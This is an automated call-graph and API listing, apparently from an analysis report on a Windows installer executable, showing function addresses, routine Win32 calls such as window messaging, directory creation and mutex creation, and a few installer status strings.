42e250 2 API calls 49645->49646 49647 474676 49646->49647 49648 4746a9 49647->49648 49650 407988 33 API calls 49647->49650 49659 459c98 6CAD5550 6CAD5550 6CAD5550 49648->49659 49652 4746a1 49650->49652 49651 4746b3 49653 4746c1 49651->49653 49660 451de8 18 API calls 49651->49660 49658 451de8 18 API calls 49652->49658 49656 403568 4 API calls 49653->49656 49657 4746db 49656->49657 49658->49648 49659->49651 49660->49653 49661 484968 49662 4849a2 49661->49662 49663 4849ae 49662->49663 49664 4849a4 49662->49664 49666 4849bd 49663->49666 49667 4849e6 49663->49667 49860 40916c MessageBeep 49664->49860 49669 4470c8 32 API calls 49666->49669 49672 484a1e 49667->49672 49673 4849f5 49667->49673 49668 403568 4 API calls 49670 484ffa 49668->49670 49671 4849ca 49669->49671 49674 403548 4 API calls 49670->49674 49861 406c44 49671->49861 49682 484a2d 49672->49682 49683 484a56 49672->49683 49676 4470c8 32 API calls 49673->49676 49677 485002 49674->49677 49679 484a02 49676->49679 49869 406c94 18 API calls 49679->49869 49685 4470c8 32 API calls 49682->49685 49688 484a7e 49683->49688 49689 484a65 49683->49689 49684 484a0d 49870 44741c 19 API calls 49684->49870 49687 484a3a 49685->49687 49871 406cc8 18 API calls 49687->49871 49696 484a8d 49688->49696 49697 484ab2 49688->49697 49873 407314 19 API calls 49689->49873 49692 484a45 49872 44741c 19 API calls 49692->49872 49693 484a6d 49874 44741c 19 API calls 49693->49874 49698 4470c8 32 API calls 49696->49698 49700 484aea 49697->49700 49701 484ac1 49697->49701 49699 484a9a 49698->49699 49875 40733c 49699->49875 49707 484af9 49700->49707 49708 484b22 49700->49708 49704 4470c8 32 API calls 49701->49704 49703 484aa2 49878 4471a0 19 API calls 49703->49878 49706 484ace 49704->49706 49709 42c81c 19 API calls 49706->49709 49710 4470c8 32 API calls 49707->49710 49715 484b6e 49708->49715 49716 484b31 49708->49716 49711 484ad9 49709->49711 49712 484b06 49710->49712 49879 44741c 19 API calls 49711->49879 49880 40728c 22 API calls 49712->49880 49721 484b7d 49715->49721 49722 484ba6 49715->49722 49718 4470c8 32 API calls 49716->49718 49717 484b11 49881 44741c 19 API calls 49717->49881 49720 484b40 49718->49720 49723 4470c8 32 API calls 49720->49723 49724 4470c8 32 API calls 49721->49724 49728 484bde 49722->49728 49729 484bb5 49722->49729 49725 484b51 49723->49725 49726 484b8a 49724->49726 49882 48466c 23 API calls 49725->49882 49731 42c8bc 19 API calls 49726->49731 49738 484bed 49728->49738 49739 484c16 49728->49739 49732 4470c8 32 API calls 49729->49732 49730 484b5d 49883 44741c 19 API calls 49730->49883 49734 484b95 49731->49734 49735 484bc2 49732->49735 49884 44741c 19 API calls 49734->49884 49885 42c8e4 19 API calls 49735->49885 49741 4470c8 32 API calls 49738->49741 49744 484c4e 49739->49744 49745 484c25 49739->49745 49740 484bcd 49886 44741c 19 API calls 49740->49886 49743 484bfa 49741->49743 49887 42c914 49743->49887 49753 484c5d 49744->49753 49754 484c86 49744->49754 49748 4470c8 32 API calls 49745->49748 49746 4849a9 49746->49668 49750 484c32 49748->49750 49752 42c944 19 API calls 49750->49752 49755 484c3d 49752->49755 49756 4470c8 32 API calls 49753->49756 49760 484cd2 49754->49760 49761 484c95 49754->49761 49896 44741c 19 API calls 49755->49896 49757 484c6a 49756->49757 49897 42c96c 49757->49897 49766 484ce1 49760->49766 49767 484d24 49760->49767 49763 4470c8 32 API calls 49761->49763 49765 484ca4 49763->49765 49768 4470c8 32 API calls 49765->49768 49769 4470c8 32 API calls 49766->49769 49773 484d33 49767->49773 49774 484d97 49767->49774 49770 484cb5 49768->49770 49771 484cf4 49769->49771 49903 42c568 19 API calls 49770->49903 49775 4470c8 32 API calls 49771->49775 49848 4470c8 49773->49848 49782 484dd6 49774->49782 49783 484da6 49774->49783 49778 484d05 49775->49778 49776 484cc1 49904 44741c 19 API calls 49776->49904 49905 484864 27 API calls 49778->49905 49794 484e15 49782->49794 49795 484de5 49782->49795 49786 4470c8 32 API calls 49783->49786 49785 484d13 49906 44741c 19 API calls 49785->49906 49789 484db3 49786->49789 49787 484d4e 49790 484d52 49787->49790 49791 484d87 49787->49791 49909 451424 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection 6CAD5F60 GetLastError 49789->49909 49793 4470c8 32 API calls 49790->49793 49908 4471a0 19 API calls 49791->49908 49798 484d61 49793->49798 49803 484e54 49794->49803 49804 484e24 49794->49804 49799 4470c8 32 API calls 49795->49799 49797 484dc0 49910 4471a0 19 API calls 49797->49910 49853 45179c 49798->49853 49802 484df2 49799->49802 49911 451324 49802->49911 49812 484e9c 49803->49812 49813 484e63 49803->49813 49808 4470c8 32 API calls 49804->49808 49805 484d71 49907 4471a0 19 API calls 49805->49907 49807 484dff 49918 4471a0 19 API calls 49807->49918 49811 484e31 49808->49811 49919 45192c Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 49811->49919 49820 484eab 49812->49820 49821 484ee4 49812->49821 49815 4470c8 32 API calls 49813->49815 49817 484e72 49815->49817 49816 484e3e 49920 4471a0 19 API calls 49816->49920 49819 4470c8 32 API calls 49817->49819 49822 484e83 49819->49822 49823 4470c8 32 API calls 49820->49823 49825 484ef7 49821->49825 49832 484fad 49821->49832 49921 447348 49822->49921 49824 484eba 49823->49824 49826 4470c8 32 API calls 49824->49826 49829 4470c8 32 API calls 49825->49829 49827 484ecb 49826->49827 49833 447348 19 API calls 49827->49833 49830 484f24 49829->49830 49831 4470c8 32 API calls 49830->49831 49834 484f3b 49831->49834 49832->49746 49930 44706c 32 API calls 49832->49930 49833->49746 49927 407e70 21 API calls 49834->49927 49836 484fc6 49837 42e6d0 19 API calls 49836->49837 49838 484fce 49837->49838 49931 44741c 19 API calls 49838->49931 49841 484f5d 49842 4470c8 32 API calls 49841->49842 49843 484f71 49842->49843 49928 40859c 18 API calls 49843->49928 49845 484f7c 49929 44741c 19 API calls 49845->49929 49847 484f88 49849 4470d0 49848->49849 49932 4362b0 49849->49932 49851 4470ef 49852 42c668 22 API calls 49851->49852 49852->49787 49854 4512d8 2 API calls 49853->49854 49856 4517b5 49854->49856 49855 4517b9 49855->49805 49856->49855 49857 4517dd 6CAD6060 GetLastError 49856->49857 49858 451314 Wow64RevertWow64FsRedirection 49857->49858 49859 451803 49858->49859 49859->49805 49860->49746 49862 406c53 49861->49862 49863 406c6c 49862->49863 49865 406c75 49862->49865 49864 403548 4 API calls 49863->49864 49866 406c73 49864->49866 49867 4038c0 18 API calls 49865->49867 49868 44741c 19 API calls 49866->49868 49867->49866 49868->49746 49869->49684 49870->49746 49871->49692 49872->49746 49873->49693 49874->49746 49876 403880 49875->49876 49877 407346 SetCurrentDirectoryA 49876->49877 49877->49703 49878->49746 49879->49746 49880->49717 49881->49746 49882->49730 49883->49746 49884->49746 49885->49740 49886->49746 49955 42c878 49887->49955 49890 42c931 49893 4038c0 18 API calls 49890->49893 49891 42c928 49892 403548 4 API calls 49891->49892 49894 42c92f 49892->49894 49893->49894 49895 44741c 19 API calls 49894->49895 49895->49746 49896->49746 49898 42c7b4 IsDBCSLeadByte 49897->49898 49899 42c97c 49898->49899 49900 4038c0 18 API calls 49899->49900 49901 42c98d 49900->49901 49902 44741c 19 API calls 49901->49902 49902->49746 49903->49776 49904->49746 49905->49785 49906->49746 49907->49746 49908->49746 49909->49797 49910->49746 49912 4512d8 2 API calls 49911->49912 49913 45133a 49912->49913 49914 45133e 49913->49914 49915 45135c CreateDirectoryA GetLastError 49913->49915 49914->49807 49916 451314 Wow64RevertWow64FsRedirection 49915->49916 49917 451382 49916->49917 49917->49807 49918->49746 49919->49816 49920->49746 49922 447350 49921->49922 49962 436618 VariantClear 49922->49962 49924 447373 49925 44738a 49924->49925 49963 408ca0 18 API calls 49924->49963 49925->49746 49927->49841 49928->49845 49929->49847 49930->49836 49931->49746 49933 4362bc 49932->49933 49935 4362de 49932->49935 49933->49935 49952 408ca0 18 API calls 49933->49952 49934 436361 49954 408ca0 18 API calls 49934->49954 49935->49934 49938 436331 49935->49938 49939 436325 49935->49939 49940 436355 49935->49940 49941 436349 49935->49941 49942 43633d 49935->49942 49943 403658 18 API calls 49938->49943 49947 403658 18 API calls 49939->49947 49953 404238 32 API calls 49940->49953 49944 4035dc 4 API calls 49941->49944 49942->49851 49948 43633a 49943->49948 49949 436352 49944->49949 49946 436372 49946->49851 49951 43632e 49947->49951 49948->49851 49949->49851 49950 43635e 49950->49851 49951->49851 49952->49935 49953->49950 49954->49946 49956 42c887 49955->49956 49957 42c7b4 IsDBCSLeadByte 49956->49957 49958 42c892 49957->49958 49959 42c8b4 49958->49959 49961 42c508 IsDBCSLeadByte 49958->49961 49959->49890 49959->49891 49961->49958 49962->49924 49963->49925 49964 41fc20 49965 41fc29 49964->49965 49968 41fec4 49965->49968 49967 41fc36 49969 41ffb6 49968->49969 49970 41fedb 49968->49970 49969->49967 49970->49969 49989 41fa84 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49970->49989 49972 41ff11 49973 41ff15 49972->49973 49974 41ff3b 49972->49974 49990 41fc64 49973->49990 49999 41fa84 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 49974->49999 49977 41ff49 49979 41ff73 49977->49979 49980 41ff4d 49977->49980 49984 41fc64 10 API calls 49979->49984 49983 41fc64 10 API calls 49980->49983 49981 41fc64 10 API calls 49982 41ff39 49981->49982 49982->49967 49985 41ff5f 49983->49985 49986 41ff85 49984->49986 49987 41fc64 10 API calls 49985->49987 49988 41fc64 10 API calls 49986->49988 49987->49982 49988->49982 49989->49972 49991 41fc7f 49990->49991 49992 41fa04 4 API calls 49991->49992 49993 41fc95 49991->49993 49992->49993 50000 41fa04 49993->50000 49995 41fcdd 49996 41fd00 SetScrollInfo 49995->49996 50008 41fb64 49996->50008 49999->49977 50001 4182a8 50000->50001 50002 41fa21 GetWindowLongA 50001->50002 50003 41fa5e 50002->50003 50004 41fa3e 50002->50004 50020 41f990 GetWindowLongA GetSystemMetrics GetSystemMetrics 50003->50020 50019 41f990 GetWindowLongA GetSystemMetrics GetSystemMetrics 50004->50019 50007 41fa4a 50007->49995 50009 41fb72 50008->50009 50010 41fb7a 50008->50010 50009->49981 50011 41fbb9 50010->50011 50012 41fba9 50010->50012 50018 41fbb7 50010->50018 50022 417f10 IsWindowVisible ScrollWindow SetWindowPos 50011->50022 50021 417f10 IsWindowVisible ScrollWindow SetWindowPos 50012->50021 50013 41fbf9 GetScrollPos 50013->50009 50016 41fc04 50013->50016 50017 41fc13 SetScrollPos 50016->50017 50017->50009 50018->50013 50019->50007 50020->50007 50021->50018 50022->50018 50023 420660 50024 420673 50023->50024 50044 415bf8 50024->50044 50026 4207ba 50027 4207d1 50026->50027 50051 41479c KiUserCallbackDispatcher 50026->50051 50031 4207e8 50027->50031 50052 4147e0 KiUserCallbackDispatcher 50027->50052 50028 4206ae 50028->50026 50029 420719 50028->50029 50037 42070a MulDiv 50028->50037 50049 420910 34 API calls 50029->50049 50034 42080a 50031->50034 50053 420128 12 API calls 50031->50053 50035 420732 50035->50026 50050 420128 12 API calls 50035->50050 50048 41a3cc 19 API calls 50037->50048 50040 42074f 50041 42076b MulDiv 50040->50041 50042 42078e 50040->50042 50041->50042 50042->50026 50043 420797 MulDiv 50042->50043 50043->50026 50045 415c0a 50044->50045 50054 414538 50045->50054 50047 415c22 50047->50028 50048->50029 50049->50035 50050->50040 50051->50027 50052->50031 50053->50034 50055 414552 50054->50055 50058 410710 50055->50058 50057 414568 50057->50047 50061 40df5c 50058->50061 50060 410716 50060->50057 50062 40dfbe 50061->50062 50063 40df6f 50061->50063 50068 40dfcc 50062->50068 50066 40dfcc 33 API calls 50063->50066 50067 40df99 50066->50067 50067->50060 50069 40dfdc 50068->50069 50071 40dff2 50069->50071 50080 40d898 50069->50080 50100 40e354 19 API calls 50069->50100 50083 40e204 50071->50083 50074 40d898 19 API calls 50075 40dffa 50074->50075 50075->50074 50076 40e066 50075->50076 50086 40de18 50075->50086 50078 40e204 19 API calls 50076->50078 50079 40dfc8 50078->50079 50079->50060 50081 40ecc0 19 API calls 50080->50081 50082 40d8a2 50081->50082 50082->50069 50101 40d774 50083->50101 50087 40e20c 19 API calls 50086->50087 50088 40de4b 50087->50088 50089 40ec24 19 API calls 50088->50089 50090 40de56 50089->50090 50091 40ec24 19 API calls 50090->50091 50092 40de61 50091->50092 50093 40de73 50092->50093 50094 40de7c 50092->50094 50099 40de79 50092->50099 50113 40dd80 33 API calls 50093->50113 50110 40dc90 50094->50110 50097 403568 4 API calls 50098 40df47 50097->50098 50098->50075 50099->50097 50100->50069 50102 40ecc0 19 API calls 50101->50102 50104 40d781 50102->50104 50103 40d794 50103->50075 50104->50103 50108 40edc4 19 API calls 50104->50108 50106 40d78f 50109 40d710 19 API calls 50106->50109 50108->50106 50109->50103 50114 40ae34 33 API calls 50110->50114 50112 40dcb8 50112->50099 50113->50099 50114->50112 50115 42e2ab SetErrorMode 50116 40ceec 50119 406fa4 WriteFile 50116->50119 50120 406fc1 50119->50120 50121 45392b CloseHandle 50122 453945 50121->50122 50123 45393a WaitForInputIdle 50121->50123 50124 45396b GetExitCodeProcess CloseHandle 50122->50124 50126 453954 MsgWaitForMultipleObjects 50122->50126 50123->50122 50125 453981 50124->50125 50127 403568 4 API calls 50125->50127 50126->50122 50126->50124 50128 45399b 50127->50128 50129 403548 4 API calls 50128->50129 50130 4539a3 50129->50130 50131 403548 4 API calls 50130->50131 50132 4539ab 50131->50132 50133 4223ac 50134 4223bb 50133->50134 50139 42133c 50134->50139 50138 4223db 50140 4213ab 50139->50140 50154 42134b 50139->50154 50143 4213bc 50140->50143 50164 412598 GetMenuItemCount GetMenuStringA GetMenuState 50140->50164 50142 4213ea 50144 421405 50142->50144 50151 42145d 50142->50151 50143->50142 50145 421482 50143->50145 50156 421428 GetMenu 50144->50156 50160 42145b 50144->50160 50149 421496 SetMenu 50145->50149 50145->50160 50146 4214ae 50167 421284 24 API calls 50146->50167 50149->50160 50150 4214b5 50150->50138 50162 4222b0 10 API calls 50150->50162 50152 421471 50151->50152 50151->50160 50155 42147a SetMenu 50152->50155 50154->50140 50163 408dc0 33 API calls 50154->50163 50155->50160 50157 421432 50156->50157 50158 42144b 50156->50158 50161 421445 SetMenu 50157->50161 50165 412598 GetMenuItemCount GetMenuStringA GetMenuState 50158->50165 50160->50146 50166 421ef4 25 API calls 50160->50166 50161->50158 50162->50138 50163->50154 50164->50143 50165->50160 50166->50146 50167->50150 50168 4856f8 50169 48572c 50168->50169 50170 48572e 50169->50170 50171 485742 50169->50171 50304 44706c 32 API calls 50170->50304 50174 48577e 50171->50174 50175 485751 50171->50175 50173 485737 Sleep 50188 485779 50173->50188 50180 48578d 50174->50180 50183 4857ba 50174->50183 50177 4470c8 32 API calls 50175->50177 50176 403568 4 API calls 50178 485bec 50176->50178 50179 485760 50177->50179 50181 485768 FindWindowA 50179->50181 50182 4470c8 32 API calls 50180->50182 50184 447348 19 API calls 50181->50184 50185 48579a 50182->50185 50186 4857c9 50183->50186 50187 485810 50183->50187 50184->50188 50190 4857a2 FindWindowA 50185->50190 50305 44706c 32 API calls 50186->50305 50195 48586c 50187->50195 50196 48581f 50187->50196 50188->50176 50192 447348 19 API calls 50190->50192 50191 4857d5 50306 44706c 32 API calls 50191->50306 50194 4857b5 50192->50194 50194->50188 50203 4858c8 50195->50203 50204 48587b 50195->50204 50309 44706c 32 API calls 50196->50309 50197 4857e2 50307 44706c 32 API calls 50197->50307 50199 48582b 50310 44706c 32 API calls 50199->50310 50202 4857ef 50308 44706c 32 API calls 50202->50308 50213 485902 50203->50213 50214 4858d7 50203->50214 50314 44706c 32 API calls 50204->50314 50205 485838 50311 44706c 32 API calls 50205->50311 50209 4857fa SendMessageA 50212 447348 19 API calls 50209->50212 50210 485887 50315 44706c 32 API calls 50210->50315 50211 485845 50312 44706c 32 API calls 50211->50312 50212->50194 50223 485950 50213->50223 50224 485911 50213->50224 50218 4470c8 32 API calls 50214->50218 50216 485894 50316 44706c 32 API calls 50216->50316 50221 4858e4 50218->50221 50220 485850 PostMessageA 50313 4471a0 19 API calls 50220->50313 50228 4858ec RegisterClipboardFormatA 50221->50228 50222 4858a1 50317 44706c 32 API calls 50222->50317 50232 48595f 50223->50232 50233 4859a4 50223->50233 50319 44706c 32 API calls 50224->50319 50231 447348 19 API calls 50228->50231 50229 4858ac SendNotifyMessageA 50318 4471a0 19 API calls 50229->50318 50230 48591d 50320 44706c 32 API calls 50230->50320 50231->50188 50322 44706c 32 API calls 50232->50322 50242 4859f8 50233->50242 50243 4859b3 50233->50243 50237 48592a 50321 44706c 32 API calls 50237->50321 50238 48596b 50323 44706c 32 API calls 50238->50323 50241 485935 SendMessageA 50245 447348 19 API calls 50241->50245 50250 485a5a 50242->50250 50251 485a07 50242->50251 50326 44706c 32 API calls 50243->50326 50244 485978 50324 44706c 32 API calls 50244->50324 50245->50194 50248 4859bf 50327 44706c 32 API calls 50248->50327 50249 485983 PostMessageA 50325 4471a0 19 API calls 50249->50325 50259 485a69 50250->50259 50260 485ae1 50250->50260 50255 4470c8 32 API calls 50251->50255 50253 4859cc 50328 44706c 32 API calls 50253->50328 50257 485a14 50255->50257 50261 42e250 2 API calls 50257->50261 50258 4859d7 SendNotifyMessageA 50329 4471a0 19 API calls 50258->50329 50263 4470c8 32 API calls 50259->50263 50268 485af0 50260->50268 50269 485b16 50260->50269 50264 485a21 50261->50264 50265 485a78 50263->50265 50266 485a37 GetLastError 50264->50266 50267 485a27 50264->50267 50330 44706c 32 API calls 50265->50330 50270 447348 19 API calls 50266->50270 50271 447348 19 API calls 50267->50271 50335 44706c 32 API calls 50268->50335 50278 485b48 50269->50278 50279 485b25 50269->50279 50273 485a35 50270->50273 50271->50273 50275 447348 19 API calls 50273->50275 50274 485afa FreeLibrary 50336 4471a0 19 API calls 50274->50336 50275->50188 50287 485b57 50278->50287 50293 485b8b 50278->50293 50281 4470c8 32 API calls 50279->50281 50280 485a8b 6CAD5550 50282 485ad1 50280->50282 50283 485a97 50280->50283 50285 485b31 50281->50285 50334 4471a0 19 API calls 50282->50334 50331 44706c 32 API calls 50283->50331 50291 485b39 CreateMutexA 50285->50291 50289 4470c8 32 API calls 50287->50289 50288 485aa3 50332 44706c 32 API calls 50288->50332 50295 485b63 50289->50295 50291->50188 50292 485ab0 50296 447348 19 API calls 50292->50296 50293->50188 50294 4470c8 32 API calls 50293->50294 50301 485ba6 50294->50301 50297 485b74 OemToCharBuffA 50295->50297 50298 485ac1 50296->50298 50337 44741c 19 API calls 50297->50337 50333 4471a0 19 API calls 50298->50333 50302 485bb7 CharToOemBuffA 50301->50302 50338 44741c 19 API calls 50302->50338 50304->50173 50305->50191 50306->50197 50307->50202 50308->50209 50309->50199 50310->50205 50311->50211 50312->50220 50313->50194 50314->50210 50315->50216 50316->50222 50317->50229 50318->50188 50319->50230 50320->50237 50321->50241 50322->50238 50323->50244 50324->50249 50325->50194 50326->50248 50327->50253 50328->50258 50329->50188 50330->50280 50331->50288 50332->50292 50333->50188 50334->50188 50335->50274 50336->50188 50337->50188 50338->50188 50339 477a74 50414 465548 50339->50414 50342 477ac0 50344 414bb0 18 API calls 50342->50344 50345 477ad0 50344->50345 50346 403598 18 API calls 50345->50346 50347 477add 50346->50347 50417 4657b0 50347->50417 50350 477aed 50352 414bb0 18 API calls 50350->50352 50353 477afd 50352->50353 50354 403598 18 API calls 50353->50354 50355 477b0a 50354->50355 50356 463468 SendMessageA 50355->50356 50357 477b23 50356->50357 50358 4636b4 48 API calls 50357->50358 50359 477b39 50358->50359 50360 463824 48 API calls 50359->50360 50361 477b4c 50360->50361 50362 477b5f 50361->50362 50590 46fa54 35 API calls 50361->50590 50364 4242a4 11 API calls 50362->50364 50365 477b69 50364->50365 50366 477b8f 50365->50366 50367 477b7a SetActiveWindow 50365->50367 50446 47712c 50366->50446 50367->50366 50596 465568 50414->50596 50418 4657d9 50417->50418 50419 414bb0 18 API calls 50418->50419 50429 465826 50418->50429 50420 4657ef 50419->50420 50679 460848 20 API calls 50420->50679 50421 403568 4 API calls 50423 4658d0 50421->50423 50423->50350 50589 408c74 19 API calls 50423->50589 50424 4657f7 50425 414be0 18 API calls 50424->50425 50426 465805 50425->50426 50427 465812 50426->50427 50430 46582b 50426->50430 50680 473ecc 53 API calls 50427->50680 50429->50421 50431 465843 50430->50431 50681 46092c CharNextA 50430->50681 50682 473ecc 53 API calls 50431->50682 50434 46583f 50434->50431 50435 465859 50434->50435 50436 465875 50435->50436 50437 46585f 50435->50437 50684 42c9b4 CharNextA 50436->50684 50683 473ecc 53 API calls 50437->50683 50440 465882 50440->50429 50685 4609b8 18 API calls 50440->50685 50442 465899 50443 450b18 18 API calls 50442->50443 50444 4658a6 50443->50444 50686 473ecc 53 API calls 50444->50686 50447 47714f 50446->50447 50449 47717d 50446->50449 50448 487a5c 32 API calls 50447->50448 50448->50449 50450 46d3ac 50449->50450 50451 455b64 39 API calls 50450->50451 50452 46d3f8 50451->50452 50453 40733c SetCurrentDirectoryA 50452->50453 50454 46d402 50453->50454 50687 466edc 50454->50687 50457 4571b4 4 API calls 50458 46d42c 50457->50458 50459 471af8 48 API calls 50458->50459 50460 46d456 50459->50460 50461 46d466 50460->50461 51119 451de8 18 API calls 50460->51119 50463 46d47d 50461->50463 51120 451de8 18 API calls 50461->51120 50464 46eef4 34 API calls 50463->50464 50466 46d488 50464->50466 50467 403598 18 API calls 50466->50467 50468 46d4a5 50467->50468 50469 403598 18 API calls 50468->50469 50470 46d4b3 50469->50470 50588 408c74 19 API calls 50590->50362 50597 414bb0 18 API calls 50596->50597 50598 46559a 50597->50598 50646 4607bc 50598->50646 50601 414be0 18 API calls 50602 4655ac 50601->50602 50603 4655bb 50602->50603 50606 4655d4 50602->50606 50655 473ecc 53 API calls 50603->50655 50605 4655cf 50607 403568 4 API calls 50605->50607 50609 46561b 50606->50609 50610 465602 50606->50610 50608 465567 50607->50608 50608->50342 50608->50588 50611 465678 50609->50611 50624 46561f 50609->50624 50656 473ecc 53 API calls 50610->50656 50658 42cb54 CharNextA 50611->50658 50614 465687 50615 46568b 50614->50615 50618 4656a4 50614->50618 50659 473ecc 53 API calls 50615->50659 50617 46565f 50657 473ecc 53 API calls 50617->50657 50619 4656c8 50618->50619 50660 46092c CharNextA 50618->50660 50662 473ecc 53 API calls 50619->50662 50623 4656b8 50623->50619 50661 46095c CharNextA 50623->50661 50624->50617 50624->50618 50626 4656c4 50626->50619 50627 4656e1 50626->50627 50628 4038c0 18 API calls 50627->50628 50629 4656f7 50628->50629 50663 42c9b4 CharNextA 50629->50663 50631 465704 50632 465736 50631->50632 50633 465708 50631->50633 50666 42c8e4 19 API calls 50632->50666 50664 4609b8 18 API calls 50633->50664 50636 46571b 50638 450b18 18 API calls 50636->50638 50637 465741 50639 42c4c4 19 API calls 50637->50639 50640 465728 50638->50640 50641 46574c 50639->50641 50665 473ecc 53 API calls 50640->50665 50643 42cd54 21 API calls 50641->50643 50644 465754 50643->50644 50644->50605 50667 473ecc 53 API calls 50644->50667 50649 4607d6 50646->50649 50648 42cbc4 20 API calls 50648->50649 50649->50648 50650 403598 18 API calls 50649->50650 50651 406c44 18 API calls 50649->50651 50652 46081f 50649->50652 50668 42cac4 50649->50668 50650->50649 50651->50649 50653 403568 4 API calls 50652->50653 50654 460839 50653->50654 50654->50601 50655->50605 50656->50605 50657->50605 50658->50614 50659->50605 50660->50623 50661->50626 50662->50605 50663->50631 50664->50636 50665->50605 50666->50637 50667->50605 50669 4035dc 4 API calls 50668->50669 50672 42cad4 50669->50672 50670 40388c 18 API calls 50670->50672 50672->50670 50674 42cb0a 50672->50674 50677 42c508 IsDBCSLeadByte 50672->50677 50673 42cb4e 50673->50649 50674->50673 50676 403900 18 API calls 50674->50676 50678 42c508 IsDBCSLeadByte 50674->50678 50676->50674 50677->50672 50678->50674 50679->50424 50680->50429 50681->50434 50682->50429 50683->50429 50684->50440 50685->50442 50686->50429 50688 466f03 50687->50688 50689 466f80 50688->50689 50690 46f6a4 33 API calls 50688->50690 51126 44f688 50689->51126 50690->50688 51119->50461 51120->50463 51129 44f69c 51126->51129 51130 44f6ad 51129->51130 51131 44f6ce MulDiv 51130->51131 51132 44f699 51130->51132 51133 4182a8 51131->51133 51132->50457 51134 44f6f9 SendMessageA 51133->51134 51134->51132 52067 40d134 52068 40d13c 52067->52068 52069 40d166 52068->52069 52070 40d16a 52068->52070 52071 40d15f 52068->52071 52073 40d180 52070->52073 52074 40d16e 52070->52074 52080 4063a0 GlobalHandle GlobalUnWire GlobalFree 52071->52080 52081 406384 GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 52073->52081 52079 406374 GlobalAlloc GlobalFix 52074->52079 52077 40d17c 52077->52069 52078 408d50 19 API calls 52077->52078 52078->52069 52079->52077 52080->52069 52081->52077 52082 4166b4 72E69840 52083 4487bc 52084 4487f1 52083->52084 52085 4487ea 52083->52085 52086 448810 52084->52086 52087 4487fa 52084->52087 52090 403548 4 API calls 52085->52090 52089 4035dc 4 API calls 52086->52089 52129 4485fc 20 API calls 52087->52129 52092 44881e 52089->52092 52093 44899b 52090->52093 52091 448805 52091->52086 52094 448809 52091->52094 52095 403900 18 API calls 52092->52095 52094->52085 52096 44883a 52095->52096 52097 403900 18 API calls 52096->52097 52098 448856 52097->52098 52098->52085 52099 44886a 52098->52099 52100 403900 18 API calls 52099->52100 52101 448884 52100->52101 52102 431034 18 API calls 52101->52102 52103 4488a6 52102->52103 52104 431104 18 API calls 52103->52104 52110 4488c6 52103->52110 52104->52103 52105 44891c 52118 442424 52105->52118 52106 448904 52106->52105 52131 4436c0 18 API calls 52106->52131 52109 448950 GetLastError 52132 448590 18 API calls 52109->52132 52110->52106 52130 4436c0 18 API calls 52110->52130 52113 44895f 52133 443700 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52113->52133 52115 448974 52134 443710 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52115->52134 52117 44897c 52119 443402 52118->52119 52120 44245d 52118->52120 52122 403548 4 API calls 52119->52122 52121 403548 4 API calls 52120->52121 52123 442465 52121->52123 52124 443417 52122->52124 52125 431034 18 API calls 52123->52125 52124->52109 52127 442471 52125->52127 52126 4433f2 52126->52109 52127->52126 52135 441afc 18 API calls 52127->52135 52129->52091 52130->52110 52131->52105 52132->52113 52133->52115 52134->52117 52135->52127 52136 40cfb8 52137 40cfc5 52136->52137 52138 40cfca 52136->52138 52140 406fdc CloseHandle 52137->52140 52140->52138 52141 463978 52142 46399f 52141->52142 52161 472fc8 52142->52161 52144 4639b1 52145 460724 33 API calls 52144->52145 52160 463a0f 52144->52160 52147 4639bf 52145->52147 52146 403548 4 API calls 52148 463a40 52146->52148 52149 4036c4 18 API calls 52147->52149 52150 4639cc 52149->52150 52151 4036c4 18 API calls 52150->52151 52152 4639d9 52151->52152 52153 4036c4 18 API calls 52152->52153 52154 4639e6 52153->52154 52155 4036c4 18 API calls 52154->52155 52156 4639f4 52155->52156 52157 414be0 18 API calls 52156->52157 52158 463a02 52157->52158 52159 460a5c 23 API calls 52158->52159 52159->52160 52160->52146 52162 472ff6 52161->52162 52166 47302c 52161->52166 52178 4544b0 52162->52178 52163 403568 4 API calls 52164 47312d 52163->52164 52164->52144 52166->52163 52167 4730f6 52167->52144 52168 46f6a4 33 API calls 52171 473020 52168->52171 52169 471af8 48 API calls 52169->52171 52170 471af8 48 API calls 52174 4730a4 52170->52174 52171->52166 52171->52167 52171->52168 52171->52169 52171->52174 52185 472b88 47 API calls 52171->52185 52173 42c944 19 API calls 52173->52174 52174->52170 52174->52171 52174->52173 52175 42c96c 19 API calls 52174->52175 52177 4730e3 52174->52177 52186 472cd4 67 API calls 52174->52186 52175->52174 52177->52166 52179 4544c1 52178->52179 52180 4544c5 52179->52180 52181 4544ce 52179->52181 52187 4541b4 52180->52187 52195 454294 47 API calls 52181->52195 52184 4544cb 52184->52171 52185->52171 52186->52174 52188 42dcb4 6CAD6790 52187->52188 52189 4541d1 52188->52189 52190 45421f 52189->52190 52196 4540e8 52189->52196 52190->52184 52193 4540e8 20 API calls 52194 454200 RegCloseKey 52193->52194 52194->52184 52195->52184 52197 42dbf0 20 API calls 52196->52197 52200 454110 52197->52200 52198 403568 4 API calls 52199 45419a 52198->52199 52199->52193 52200->52198
                                          APIs
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          • LocalFileTimeToFileTime.KERNEL32(-00000034,00000004,00000000,00469B46,?,00000000,00469B8F,?,00000000,00469CC8,?,00000000,?,00000000,?,0046A60E), ref: 00468E67
                                            • Part of subcall function 00453494: FindClose.KERNEL32(00000000,000000FF,00468E7E,00000000,00469B46,?,00000000,00469B8F,?,00000000,00469CC8,?,00000000,?,00000000), ref: 004534AA
                                            • Part of subcall function 00467170: FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00467178
                                            • Part of subcall function 00467170: FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 00467187
                                            • Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840
                                            • Part of subcall function 00452DC4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F9B,?,00000000,0045305F), ref: 00452EEB
                                          Strings
                                          • .tmp, xrefs: 004694C0
                                          • Installing the file., xrefs: 00469412
                                          • Incrementing shared file count (64-bit)., xrefs: 00469A1E
                                          • Will register the file (a DLL/OCX) later., xrefs: 004699B1
                                          • Time stamp of existing file: %s, xrefs: 00468F3D
